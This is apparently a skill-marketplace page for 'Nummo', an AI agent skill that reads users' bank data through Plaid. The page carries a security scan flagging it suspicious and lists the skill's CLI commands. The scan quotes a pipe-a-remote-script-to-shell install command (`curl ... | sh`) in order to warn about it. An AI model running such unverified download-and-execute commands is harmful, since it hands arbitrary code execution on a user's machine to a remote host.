ClawHub
Skill flagged — suspicious patterns detected

ClawHub Security flagged this skill as suspicious. Review the scan results before using.

Nummo

v0.1.8

Nummo connects AI agents to the user's bank accounts via Plaid, enabling financial insights through natural language. More info at nummo.ai.

0· 388·0 current·0 all-time
by@nummo-ai
Security Scan
VirusTotalVirusTotal
Suspicious
View report →
OpenClawOpenClaw
Suspicious
medium confidence
Purpose & Capability
The name, description, and listed CLI commands (auth, accounts, txs, summary, subscription flows) are coherent with a Plaid-backed banking insights skill. There are no unrelated binaries or environment variables requested that would contradict the stated purpose.
Instruction Scope
SKILL.md stays on-topic: it instructs the agent to request explicit user permission, to present Plaid/Stripe URLs for the user to open in a browser, and to use specific commands for account and transaction queries. The instructions do not direct the agent to read unrelated system files or to exfiltrate data to unexpected endpoints.
!
Install Mechanism
Although the skill is instruction-only, reference/install.md tells users to run `curl -fsSL https://nummo.ai/install | sh`. That is a high-risk pattern (download-and-execute from a remote host). Even if the domain matches the project, piping an external script to sh grants arbitrary code execution and is disproportionate as an install instruction without an install spec or verified release host.
Credentials
The skill declares no required environment variables or credentials, which is consistent with a flow that uses Plaid Link and magic-link auth (browser-based). However, the skill will result in access to highly sensitive financial data once a user connects accounts, so lack of declared credentials does not eliminate privacy/security risk — verify how and where data is stored and transmitted.
Persistence & Privilege
The skill does not request 'always' or other elevated platform privileges; it is user-invocable and relies on explicit user consent per the guidelines in SKILL.md.
What to consider before installing
This skill appears to do what it claims (connecting to banks via Plaid and providing summaries/transactions). However, do NOT run the suggested `curl ... | sh` install command without verification: piping a remote script to the shell executes arbitrary code from the site. Before installing or using the CLI, verify the publisher (nummo.ai), check for an official release page or signed installer, and review the install script contents on the server. Ask the vendor for a reproducible, auditable install method (e.g., package on a well-known registry or a downloadable release with checksums). Also confirm the privacy/security details: where transaction data is stored, who can access it, retention policy, and whether the agent or third parties can access raw data. If you prefer safer operation, use the read-only browser-based Plaid Link flows and ensure the agent asks for explicit permission before invoking any commands that access your financial data.

Like a lobster shell, security has layers — review code before you run it.

latestvk970kcbgm94sc8ktk0wjvym3jx823cmr
388downloads
0stars
3versions
Updated 6h ago
v0.1.8
MIT-0
@nummo-ai
latest
Download

Commands

Authentication

nummo auth signup <email> Creates a new Nummo account and sends a magic link to the provided email. Use when the user wants to get started or is not yet authenticated.

nummo auth status Checks whether the user is authenticated and shows their email and session expiry. Use to verify setup before running other commands.

Accounts

nummo accounts connect Starts the bank connection flow and returns a Plaid Link URL. Share the URL with the user — they must open it in a browser to connect their bank. Use when the user wants to add a bank account.

nummo accounts list Lists all connected bank accounts grouped by institution, with account name and last 4 digits. Use to show the user what banks are connected, or to verify a connection was successful.

nummo accounts txs [--from YYYY-MM-DD] [--to YYYY-MM-DD] [--all] Returns individual transactions with date, merchant, amount, account, and category. Default range: last 7 days. Use --all to fetch all available history. Amounts: + = income, - = spending. Use for: finding specific transactions, merchant lookups, category drill-downs, recent activity.

nummo accounts summary [--from YYYY-MM-DD] [--to YYYY-MM-DD] Returns total income and spending, broken down by category and subcategory. Default range: last 30 days. Use for: spending overviews, budget questions, monthly recaps, "how much did I spend on X".

Subscription

nummo sub tiers Lists available subscription plans with pricing, billing interval, account limits, and transaction history access.

nummo sub me Shows the user's current plan, status, trial end date or next billing date. Use to check subscription status or when the user asks about their plan.

nummo sub checkout <tier> Creates a Stripe checkout session for trial users and returns a payment URL. Share the URL with the user — they must open it in a browser to complete the purchase. Valid tiers: pro_monthly, pro_yearly, max_monthly, max_yearly. Use nummo sub tiers first if the user is unsure which plan to choose.

nummo sub change <tier> Same as checkout but for users who are already subscribed and want to change plans.

nummo sub cancel Informs the user how to cancel their subscription.

Guidelines

  • Always ask for permission before calling any tool. This skill gives you read access to financial data, and you must get explicit consent from the user.
  • If no date range is mentioned, use the command defaults — don't ask the user for dates.
  • Use summary by default when the user asks broad questions about their finances. - Use txs for specific lookups or drill-downs.
  • When a command returns a URL (connect, checkout, change), always present it clearly and tell the user to open it in their browser.

Comments

Loading comments...